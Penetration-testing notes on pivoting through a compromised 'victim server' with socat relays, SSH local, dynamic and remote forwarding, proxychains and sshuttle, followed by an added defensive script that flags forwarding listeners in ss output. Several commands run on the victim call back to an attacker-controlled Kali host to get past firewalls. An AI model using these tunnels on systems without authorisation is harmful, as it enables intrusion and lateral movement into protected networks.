Port Forwarding and SSH Tunneling

Port Forwarding [Socat]

If socat is not installed, you can download and run a statically linked binary instead.

You can open a port on a machine that forwards our traffic through the victim's server.

Listen on PORT1.

Then forward all traffic it receives to TCP PORT2 on the other machine (IP).

Now your PORT1 acts as PORT2 on the other machine.

socat -ddd TCP-LISTEN:<PORT1>,fork TCP:<IP>:<PORT2> # open port

SSH Tunneling

You can tunnel network traffic through other servers using SSH.

SSH Local Port Forwarding

Shares a specific port across networks.

0.0.0.0:<PORT1> - the port we open on the machine where we run the command (0.0.0.0 binds it on all interfaces)

<DESTINATION_IP>:<PORT2> - the machine and port we want to "borrow"

<USER_JUMP>@<JUMP_IP> - the proxy server, which has access to both networks

ssh -N -L 0.0.0.0:<PORT1>:<DESTINATION_IP>:<PORT2> <USER_JUMP>@<JUMP_IP>

SSH Dynamic Port Forwarding

Shares a jump host that lets us reach multiple ports across the network using proxychains.

0.0.0.0:<LOCAL_PORT> - the port we open on the machine where we run the command

<USER>@<IP> - the remote machine that will forward our commands

ssh -N -D 0.0.0.0:<LOCAL_PORT> <USER>@<IP>

Edit /etc/proxychains4.conf:

socks5 <IP> <PORT>

You can run the commands using proxychains:

proxychains <command>

SSH Remote Port Forwarding

Reverse shell but for port forwarding

Bypasses the firewall by creating outgoing SSH traffic from the victim server. The port can be shared even if we cannot connect to any port on the victim server.

Kali set up:

Set PasswordAuthentication to yes in /etc/ssh/sshd_config.

Set PermitRootLogin to yes in /etc/ssh/sshd_config.

Start ssh:

sudo systemctl start ssh

Check that the port is in fact open:

sudo ss -ntplu

Victim Server set up:

ssh -N -R 127.0.0.1:<KALI_PORT>:<VICTIM_SERVER>:<VICTIM_PORT> kali@<KALI_IP>

Kali check:

ss -ntplu

If everything went right, you should be able to access the port on your Kali machine.

SSH Remote Dynamic Port Forwarding

Requires OpenSSH 7.6 or newer.

Reverse shell but for port forwarding (multiple ports instead of one)

Victim server:

ssh -N -R <PORT> kali@<KALI_IP>

Kali opened port check:

sudo ss -ntplu
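
An added example, not part of the original page: a shell function that filters the ss -ntplu output used in the checks above and lists TCP listeners owned by ssh, sshd or socat, marking the ones bound to all interfaces. The sample output (addresses, ports, PIDs) and the function names are constructed for illustration.

```shell
#!/usr/bin/env bash
# Constructed sample of `sudo ss -ntplu` output (addresses, ports, PIDs are made up).
sample_ss_output() {
cat <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128    127.0.0.1:8080     0.0.0.0:*         users:(("sshd",pid=2301,fd=9))
tcp   LISTEN 0      128    0.0.0.0:1080       0.0.0.0:*         users:(("ssh",pid=2410,fd=4))
tcp   LISTEN 0      5      0.0.0.0:4444       0.0.0.0:*         users:(("socat",pid=2500,fd=5))
tcp   LISTEN 0      128    127.0.0.1:631      0.0.0.0:*         users:(("cupsd",pid=640,fd=7))
udp   UNCONN 0      0      127.0.0.53%lo:53   0.0.0.0:*         users:(("systemd-resolve",pid=500,fd=13))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=812,fd=4))
EOF
}

# Read `ss -ntplu` output on stdin; print "<scope> <process> <address> <port>"
# for every TCP listener owned by ssh, sshd or socat.
# $1 = port the SSH daemon itself listens on (default 22), which is skipped.
flag_forwarding_listeners() {
  local sshd_port="${1:-22}"
  awk -v sshd_port="$sshd_port" '
    $2 != "LISTEN" { next }            # drops the header and UDP sockets
    {
      split($7, q, "\"")               # users:(("name",pid=..,fd=..)) -> q[2] is the name
      proc = q[2]
      if (proc != "ssh" && proc != "sshd" && proc != "socat") next
      n = split($5, a, ":")            # port is the text after the last colon
      port = a[n]
      addr = substr($5, 1, length($5) - length(port) - 1)
      if (proc == "sshd" && port == sshd_port) next
      if (addr == "0.0.0.0" || addr == "*" || addr == "[::]") scope = "EXPOSED"
      else if (addr ~ /^127\./ || addr == "[::1]") scope = "loopback"
      else scope = "interface"
      print scope, proc, addr, port
    }'
}

# On a live host: sudo ss -ntplu | flag_forwarding_listeners
sample_ss_output | flag_forwarding_listeners
```

Listeners created with -L or -D belong to the ssh client process, while a -R listener appears under sshd on the machine that accepted the connection. Without root, ss omits the process column and nothing is matched.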

Sshuttle

Requires root privileges and python3

Uses SSH as a VPN that forces traffic through the SSH tunnel.

sshuttle -r <user>@<IP>:<SSH_PORT> <SUBNET1> <SUBNET2>
